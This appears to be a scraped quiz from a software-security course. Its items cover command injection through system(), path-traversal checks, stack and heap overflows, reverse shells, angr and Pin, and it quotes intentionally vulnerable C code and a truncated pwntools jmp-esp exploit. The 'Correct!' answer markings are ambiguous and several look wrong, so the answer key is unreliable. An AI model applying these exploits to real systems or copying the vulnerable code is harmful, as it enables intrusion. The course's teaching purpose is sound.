In our lecture, we have the following code: #include <stdio.h> #include <stdlib.h> int main(int argc, char **argv){ char command[100]; sprintf(command, "cat grades/%s", argv[1]); system(command); return 0; } Suppose there are only two files in subfolder grades named alice and bob, and their contents are A and B, respectively. Select if the following is True or False: Command $ ./cat_grade `python3 -c 'print("A"*4)'` will print out the content of files without error message.
True Correct! False
In out lecture, we have the following two programs: cat_grade_arg_check.c #include <stdio.h>#include <stdlib.h>#include <string.h>#define CMD_LEN 128int main(int argc, char **argv){char command[CMD_LEN + 12];if (argc !=2){printf("cat_grade <name>\n");return 1;}if (strlen(argv[1])>CMD_LEN){printf("The <name> you provide is too long\n");return 2;}snprintf(command, 100, "cat grades/%s", argv[1]);system(command);return 0;} cat_grade_exec_path_check.c #include <stdio.h>#include <stdlib.h>#include <string.h>#include <unistd.h>#define CMD_LEN 128int valid_path(char *path) {if (strchr(path,'.')) return 0;if (strchr(path,'/'))return 0;return 1;}int main(int argc, char **argv) {char path[CMD_LEN + 12];if (argc !=2) {printf("cat_grade <name>\n");return 1;}if (strlen(argv[1])>CMD_LEN) {printf("The <name> you provide is too long\n");return 2;}if(!valid_path(argv[1])) {printf("invalid path input %s\n",argv[1]);return 3;}snprintf(path, CMD_LEN+12, "./grades/%s", argv[1]);execl("/bin/cat","/bin/cat", path, NULL);return 0;} Select if the following is True or False: $ ./cat_grade_arg_check ../.. and $ ./cat_grade_exec_path_check ../.. will output the same result.
True Correct! False
NX/DEP implementation does not need kernel support.
True Correct! False
On 64-bit x86 machines, the registers used to pass the parameters for system calls and library calls are the same.
True Correct! False
Recursive always successfully recover all instructions in the binary.
True Correct! False
Select if the following is True or False: $ ./cat_grade_arg_check ../.. and $ ./cat_grade_exec_path_check ../.. will output the same result.
True Correct! False
The frame of function client_handle includes memory between buffer start address and the address for saved ebp, exclusively. address 0xffffd0ec 0xffffcedc return address (512+12+4) ___ 0xffffd148 saved ebp | | frame of client | handle 0xffffcedc 0x6a 0x66 0x58 0x99 buffer ___|
True Correct! False
The linear sweep disassembling algorithm follows the control flow transfer instruction target and continues with the target instruction.
True Correct! False
The shadowed memory in the figure contains 528 bytes. address 0xffffd0ec 0xffffcedc return address (512+12+4) ___ 0xffffd148 saved ebp | | frame of client | handle 0xffffcedc 0x6a 0x66 0x58 0x99 buffer ___|
True Correct! False
Victim, not the attacker, should listen to some of its own ports to establish a reverse shell.
True Correct! False
Linux Man Page is available in:
Windows Correct! openSUSE Correct! Ubuntu Correct! Fedora
In our lecture, we use the following python code to perform a buffer overflow attack. 1 # Import everything in the pwntools namespace 2 from pwn import * 3 4 # Create an instance of the process to talk to 5 io = gdb.debug('./challenge') 6 7 # Attach a debugger to the process so that we can step through 8 pause() 9 10 # Load a copy of the binary so that we can find a JMP ESP 11 binary = ELF('./challenge') 12 13 # Assemble the byte sequence for 'jmp esp' so we can search for it 14 jmp_esp = asm('jmp esp') 15 jmp_esp = binary.search(jmp_esp).__next__() 16 17 log.info("Found jmp esp at %#x" % jmp_esp) 18 19 # Overflow the buffer with a cyclic pattern to make it easy to find offsets 20 # 21 # If we let the program crash with just the pattern as input, the register 22 # state will look something like this: 23 # 24 # EBP 0x6161616b ('kaaa') 25 # *ESP 0xff84be30 <-- 'maaanaaaoaaapaaaqaaar...' 26 # *EIP 0x6161616c ('laaa') 27 crash = False 28 29 if crash: 30 pattern = cyclic(512) 31 io.sendline(pattern) 32 pause() 33 sys.exit() 34 35 # Fill out the buffer until where we control EIP 36 exploit = cyclic(cyclic_find(0x6161616c)) 37 38 # Fill the spot we control EIP with a 'jmp esp' 39 exploit += pa
an address of instruction "jmp esp" in memory Correct! a string generated by cyclic function containing a number of bytes of up to where a byte of "0x6161616c" is found a string generated by cyclic function containing 0x6161616c number of bytes an instruction "jmp esp"
Intel Pin tools usually have two kinds of routines:
compile routines Correct! analysis routines Correct! Instrumentation routines preprocessing routines
In our lecture, we show an example of Pin tool: #include <stdio.h> #include "pin.h" FILE * trace; void printip(void *ip) { fprintf(trace, "%p\n", ip); } void Instruction(INS ins, void *v) { INS_InsertCall(ins, IPOINT_BEFORE, (AFUNPTR)printip, IARG_INST_PTR, IARG_END);} void Fini(INT32 code, void *v) { fclose(trace); } int main(int argc, char * argv[]) { trace = fopen("itrace.out", "w"); PIN_Init(argc, argv); INS_AddInstrumentFunction(Instruction, 0); PIN_AddFiniFunction(Fini, 0); PIN_StartProgram(); return 0; } While of the followings is/are true?
he Pin tool instruments at the program point after each instruction Correct! The Pin tool instruments at the program point before each instruction The Pin tool prints out each instruction compile time address Correct! The Pin tool prints out each instruction runtime address
In our lecture, we use the following python code to symbolic execute and explore the states of programs to guess the password. 1 import angr 2 import claripy 3 4 password= claripy.BVS("password",8*8) 5 proj = angr.Project('./pwdre0') 6 init_state = proj.factory.entry_state(args=['./pwdre0',password]) 7 8 def is_good(state): 9 return b'Congratulations! You win' in state.posix.dumps(1) 10 11 def is_bad(state): 12 return b'You loose. Please try again' in state.posix.dumps(1) 13 14 sm=proj.factory.simgr(init_state) 15 sm.explore(find=is_good, avoid=is_bad) 16 if sm.found: 17 found_state=sm.found[0] 18 passwd=found_state.solver.eval(password,cast_to=bytes) 19 print("Solution {}".format(passwd.decode("utf-8"))) Which line specifically carries out the symbolic execution (actually tries out all possible inputs and program paths)?
line 6 Correct! line 15 line 4 line 14
Which command shows usage of user command printf?
man 3 printf Correct! man 1 printf man 4 printf man 7 printf
To attach to process with process id 2345 using a Pin tool of mytool.so, the command is: $/my/dir/pinv -t _______ -_______ 2345
mytool.so pid
In our lecture, we use the following python code to perform a buffer overflow attack. 1 # Import everything in the pwntools namespace 2 from pwn import * 3 4 # Create an instance of the process to talk to 5 io = gdb.debug('./challenge') 6 7 # Attach a debugger to the process so that we can step through 8 pause() 9 10 # Load a copy of the binary so that we can find a JMP ESP 11 binary = ELF('./challenge') 12 13 # Assemble the byte sequence for 'jmp esp' so we can search for it 14 jmp_esp = asm('jmp esp') 15 jmp_esp = binary.search(jmp_esp).__next__() 16 17 log.info("Found jmp esp at %#x" % jmp_esp) 18 19 # Overflow the buffer with a cyclic pattern to make it easy to find offsets 20 # 21 # If we let the program crash with just the pattern as input, the register 22 # state will look something like this: 23 # 24 # EBP 0x6161616b ('kaaa') 25 # *ESP 0xff84be30 <-- 'maaanaaaoaaapaaaqaaar...' 26 # *EIP 0x6161616c ('laaa') 27 crash = False 28 29 if crash: 30 pattern = cyclic(512) 31 io.sendline(pattern) 32 pause() 33 sys.exit() 34 35 # Fill out the buffer until where we control EIP 36 exploit = cyclic(cyclic_find(0x6161616c)) 37 38 # Fill the spot we control EIP with a 'jmp esp' 39 exploit += pa
returns to the address of instruction "jmp esp", executes "jmp esp", executes the code on the stack, which is also a "jmp esp" Correct! returns to the address of instruction "jmp esp", executes "jmp esp", executes the code on the stack, which is also a sequence of code to gain a shell returns to the address of instruction on the stack, which is also a "jmp esp" returns to the address of instruction "jmp esp", does not execute "jmp esp", and directly executes the code on the stack, which is also a "jmp esp"
In pwndbg environment for a 32-bit binary, the program counter is currently before the following instruction: call 8049050 which of the followings is/are True?
si command in gdb will step to next instruction in the same function Correct! si command in gdb will step to next instruction in the callee function Correct! ni command in gdb will step to next instruction in the same function ni command in gdb will step to next instruction in the callee function
Which of the following display(s) the sections of a binary file?
strings strip Correct! readelf hexdump
Which of the following is/are memory corruption vulnerabilities?
time side channel Correct! double-free Correct! use-after-free Correct! integer overflow
In our lecture, we have the following code: heap_overflow.c #include <stdio.h> #include <stdlib.h> #include <string.h> void check_secret(char *argv1){ char *buffer1 = malloc(8); int *buffer2 = malloc(4); int secret = 0xdeadcafe; memcpy(buffer2,&secret,4); strcpy(buffer1, argv1); if ((*buffer2) == 0xdeadbeef) { puts("Congratulations! You find the flag");exit(0);} free(buffer1); free(buffer2);} int main(int argc, char **argv){ if (argc != 2) {printf("stack_overflow <secret>\n");return 1;} check_secret(argv[1]);printf("Please try again\n"); return 0; } Suppose user_input is allocated at 0x804d1b0 and secret is allocated at 0x804d1a0. Which of the followings is/are True?
user_input can overflow secret with 20 bytes of data user_input can overflow secret with 20 words of data Correct! user_input cannot overflow secret with 20 words of data Correct! user_input cannot overflow secret with 20 bytes of data
In pwndbg environment for a 32-bit binary, which of the followings is/are True??
x/100xw &targeted_data will output 100 bytes of memory start from the address of targeted_data Correct! p &targeted_data will print out the address of variable targeted_data Correct Answer p targeted_data will print out the value of variable targeted_data p &targeted_data will print out the value of variable targeted_data